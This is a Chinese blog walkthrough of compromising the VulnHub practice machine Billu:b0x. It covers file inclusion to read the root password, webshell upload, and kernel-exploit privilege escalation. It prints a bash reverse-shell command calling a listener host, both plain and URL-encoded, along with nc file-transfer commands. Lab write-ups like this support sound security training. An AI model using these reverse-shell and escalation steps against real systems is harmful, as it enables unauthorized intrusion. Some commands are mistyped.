VULNHUB BILLU:B0X 1演练

最新推荐文章于 2024-03-06 16:13:17 发布
最新推荐文章于 2024-03-06 16:13:17 发布
阅读量201 收藏
点赞数
分类专栏: 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shijianyoulei6/article/details/96916990
版权

 

点击查看作者原文链接

target IP:不详

1.

先使用nmap扫描局域网内cunhuoz主机,进行排查

排查后的到靶机IP为192.168.171.154

使用dirb扫描目录

逐个进行排查,

发现使用phpmyadmin管理数据库

发现192.168.171.154/in页面为phpinfo,搜索www找到绝对路径

发现192.168.171.154/test页面中可能存在文件包含漏洞

尝试下载phpmyadmin配置文件

无法下载,改为POST请求

下载成功,打开发现root及其密码

得到root密码,进行SSH连接,

成功!getshell

2.

用burp抓包 c.php时,发现数据库账号密码

尝试登录phpmyadmin

登陆成功,发现phpmyadmin版本号3.4.7

searchsploit phpmyadmin 3.4发现可利用的POC

 

 

 

 

 

 

 

在phmyadmin中查看web账号密码

登录web页面,查看功能,发现有上传,尝试上传木马

图片马成功

上面审计panel.php中,也发现文件包含漏洞,可以传一个load

解析13.jpg,cmd赋值whoami,执行成功

发现用户身份为wwwdata,权限不足,开始写入反弹shell,进行提权

kali开启监听

反弹shell命令,直接输入尝试不行,需要URL编码一下

echo “bash -i >& /dev/tcp/192.168.171.157/4444 >&1” | bash

%65%63%68%6F%20%22%62%61%73%68%20%2D%69%20%3E%26%20%2F%64%65%76%2F%74%63%70%2F%31%39%32%2E%31%36%38%2E%31%37%31%2E%31%35%36%2F%34%34%34%34%20%30%3E%26%31%22%20%7C%20%62%61%73%68

 

 

 

 

 

 

kali收到

lsb release -a命令无法使用,uname -a查看版本号,搜索相应的提权方式

searchsploit 3.13 找到提权poc

使用nc命令将37292.c传至靶机

kali:nc -q 1 -lp 333 < 37292.c

靶机: nv -nv 192.168.171.156 333 > 37292.c

查看用法

靶机gcc命令进行编译 gcc 37292.c -o exp

执行

获得root权限

heloy.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
billu-b0x靶场渗透
11-14
billu-b0x靶场渗透
靶机练习之Billu_b0x
10-04
通过该靶场,能够初步了解web渗透的基本流程。小白在了解了web各种漏洞原理,之后,可以练习一下该靶场,靶场做法很多。我也是一个小白,来这里记录一下学习的过程,不喜勿喷!!!感谢!!!
billu_b0x 靶机渗透实战
n5xxxx__zy的博客
07-23 1064
这啥 我咋能知道账号是啥 1、信息收集 由于kali是137 那么142肯定是你了 或者----->arp-scan -l 主机探测: 访问80端口 尝试注入: 他竟然暗示我展示我的注入skill 没办法了不能在低调下去了 尝试了常见弱口令, 万能密码 发现它把单引号过滤掉了 怎么办 扔sqlmap跑post 以前都是跑GET,怎么跑POST呢? (1)就是让sqlmap去自...
Vulnhub靶机:Billu_b0x
qq_48904485的博客
03-06 724
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机:Billu_b0x(192.168.56.107)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/billu/Billu_b0x.zip。
vulnhub靶场:BILLU: B0X
weixin_46497491的博客
03-30 178
vulnhub靶场:BILLU: B0X sql注入、文件上传、文件包含、反弹shell、Linux内核提权
vulnhub——BILLU: B0X
weixin_54431413的博客
05-31 395
第一个思路主要是来利用sql注入,文件上传和文件包含漏洞结合来拿到shell,之后利用内核漏洞提权 第二个思路主要是对目标靶机进行了完整的信息收集,拿到更多了信息,利用了文件下载漏洞,拿到了root的密码,直接利用ssh登录目标服务器
Vulnhub 渗透练习(二)—— BILLU: B0X
shinygod的博客
02-15 440
最后在靶机上依次执行如下命令,当然这边用 wget 下载,我们攻击机开个 apache 服务就行了,本来可以在攻击机上直接编译好,然后直接传 exp,但是kail 上编译的时候一直报错,就只能到靶机上编译了。通过 test 目录的文件读取 phpmyadmin 的配置信息,获得 root 密码,又因为目标靶机开了 22 端口,所以我们可以直接 ssh 登录。penal.php 最主要的就是俩个功能,一个文件包含,还有一个就是文件上传,且上传的目录也告诉我们了,/uploaded_images。
Vulnhub靶机笔记01——Billu_b0x
2301_76329510的博客
04-16 1291
test。
[VulnHub靶机渗透]一:billu_b0x
qq_45927819的博客
03-06 2923
文章目录实验环境实验步骤一、信息收集1.1 扫描主机所在网段进行主机发现1.2 端口扫描1.3 网站指纹信息扫描(whatweb)1.4 dirb爆破Web目录二、web渗透2.1 ssh爆破并获取shell2.2 web站点渗透2.2.1 index.php(登陆界面)2.2.2 add.php (空壳文件)2.2.3 test.php(文件包含可利用)2.2.4 phpmy (phpmyadmin)补充:2.2.5 phpmyadmin挂马2.2.5.1 利用outfile写文件挂马**2.2.5.2
VulnhubBILLU: B0X 2靶场
ierciyuan的博客
06-14 328
思路清晰,过程流畅,一次比较简单的靶场渗透。 涉及Drupal远程命令执行漏洞、/etc/passwd写入用户提权、suid权限文件执行提权。
vulnhub靶机 -- billu: b0x
weixin_46107179的博客
05-11 337
靶机下载地址:下载地址 搭建好环境,进行主机发现靶机的ip地址为192.168.137.147 对其进行nmap扫描,进行端口发现(22,80) 访问80端口,发现是一个登录框,叫我们尝试SQL注入,用简单的弱口令以及sqlmap跑不出来,然后尝试用burp的SQL字典来跑,跑出来了; 这里通过抓包,将其需要爆破的账号密码添加字典,并且选择cluster bomb模式 第一个字典可以选择kali里面自带的Fuzzing里面的SQL字典 第二个字典,可以就用burp自带的字典,自己添加一下键盘上的所有可
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups ...比卢:B0x 莫里亚1.1 Lazysys管理员 斗牛犬 BTRSys:DV 2.1 BTRSys 1 难以置信地容易 狄娜 Born2Root G0rmint 基本渗透 BSides Vancuver:2018年 Toppo:1 Billu Box 2 基
VMware-ovftool-4.4.0-15722219-win.x86_64.rar
05-03
1. 目标环境的虚拟硬件版本不兼容:ovftool在导入OVF或OVA时,会检查目标环境的虚拟硬件版本是否支持导入的虚拟机配置。如果目标环境的硬件版本过低,可能会导致导入失败。 2. OVF模板与导入环境不匹配:OVF文件中...
chromedriver-mac-x64_122.0.6217.0.zip
07-31
chromedriver-mac-x64_122.0.6217.0.zip
多元宇宙算法优化长短记忆网络MVO-LSTM故障诊断分类【含Matlab源码 6074期】.zip
07-31
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法优化LSTM分类预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO优化LSTM 4.4.2 粒子群算法PSO/蛙跳算法SFLA优化LSTM 4.4.3 灰狼算法GWO/狼群算法WPA优化LSTM 4.4.4 鲸鱼算法WOA/麻雀算法SSA优化LSTM 4.4.5 萤火虫算法FA/差分算法DE优化LSTM 4.4.6 其他优化算法优化LSTM
全国大学生电子设计竞赛(电赛)相关资源(流程、模板、心得、历届资料等).docx
07-31
全国大学生电子设计竞赛(简称电赛)是一项旨在促进大学生电子设计能力提升和创新能力培养的全国性学科竞赛。以下是对电赛相关资源(流程、模板、心得、历届资料等)的详细概述: 一、竞赛流程 全国大学生电子设计竞赛的流程通常包括以下几个关键步骤: 报名与组队:参赛学生需按照学校或赛区的规定时间进行报名,并组成三人一队的小组。报名时需确定参赛的组别(如本科生组或高职高专学生组)。 培训与准备:参赛队伍在比赛前需进行充分的准备,包括学习相关电子设计知识、掌握必要的软硬件技能、熟悉竞赛规则等。学校或赛区可能会组织培训课程、模拟竞赛等活动帮助参赛队伍提升能力。 竞赛开始:竞赛通常在单数年的8月份举行,为期四天三夜。竞赛当天公布题目,参赛队伍需在规定时间内完成作品设计、制作及报告撰写。 作品提交与评审:竞赛结束后,参赛队伍需将作品及报告提交给赛区组委会进行评审。评审工作包括初评和复评两个阶段,最终评选出获奖队伍。 二、竞赛模板 在电赛中,参赛队伍需要提交的作品报告通常需要遵循一定的模板格式。以下是一个简化的作品报告模板示例: 封面:包括作品名称、参赛队伍信息(队伍名称、成员姓名、学校名称等)、竞赛日
chromedriver-mac-arm64_128.0.6534.0.zip
07-31
chromedriver-mac-arm64_128.0.6534.0.zip
基于场景划分的智能网联汽车协同换道避障方法_周俊宇.caj
最新发布
07-31
基于场景划分的智能网联汽车协同换道避障方法_周俊宇
chromedriver-mac-x64_122.0.6172.0.zip
07-31
chromedriver-mac-x64_122.0.6172.0.zip
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值